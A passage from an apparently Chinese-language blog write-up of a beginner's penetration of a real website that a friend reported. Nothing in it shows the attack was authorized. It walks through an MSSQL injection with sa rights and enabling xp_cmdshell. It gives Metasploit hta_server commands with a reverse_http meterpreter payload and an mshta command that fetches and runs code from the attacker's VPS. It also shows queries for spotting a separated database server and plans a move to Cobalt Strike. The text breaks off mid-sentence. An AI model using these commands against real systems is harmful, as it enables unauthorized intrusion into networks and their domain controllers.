一 、 前言
近期一直再学习内网渗透,实验什么的都是玩玩靶机。
这一天朋友说有个站点有漏洞,就发过来看了一些是一个SQL注入,继而开启了这次内网渗透。水平有限,并且初学哈哈哈哈!没有什么技术要点纯属误打误撞,如果有什么错误的地方希望大佬多多指点!
二 、 WEB点进入内网
这次渗透是从站库分离的情况下在深入进去内网在拿下域控服务器,也都是普通的渗透思路,并没有什么技术含量!
首先WEB点是一个MSSQL注入漏洞,并且这个注入是sa权限的!
首先这个站点是使用JoomlaCMS搭建的,但是在一处Study信息登记处发现了SQL注入漏洞
接着抓下此处查询的数据包进行注入,并且或者了是高权限,可以开启xp_cmdshell来进行进一步的提权。
在注入的返回的指纹信息可以获知对方的操作系统大概率就是windows Server 2012系统
那么接下来不用想就是直接提权到MSF上面了,这里使用hta来提权到MSF
msf5 > use exploit/windows/misc/hta_servermsf5 exploit(windows/misc/hta_server) > set payload windows/meterpreter/reverse_httppayload => windows/meterpreter/reverse_httpmsf5 exploit(windows/misc/hta_server) > set lhost VPS_IPlhost => VPS_IP
这里就开始监听断开,然后需要在对方哪里执行命令。
如下
接着在执行 mshta.exe http://VPS_IP:8080/IAKWSlu.hta
执行之后对方直接上线MSF了,这里可以看到对方的主机名称就叫DATABASE.
看似一切顺利,但是往往都不会如自己想的那样,上线之后一直不能执行命令,都返回超时。在VPS的流量过去应该也不会有多大的阻碍啊!
也许是被对方的一些设备拦截了吧!
既然MSF不能操作的话,SQLMAP提供的shell也不是很好操作,那么可以试着写入webshell进入到对方主机上面。
但是我查找了一番并无WEB路径,这里时候想起了它的主机名称,会不会是一个站库分离的网站。
对于MSSQL注入查询是否站库分离很简单
select @@servernameselect host_name()
果不其然这里的确就是站库分离。
既然是MSF的流量比较明显,也不能写入webshell,那么我现在就希望能让其上线CobaltStrike吧!
经过一%A













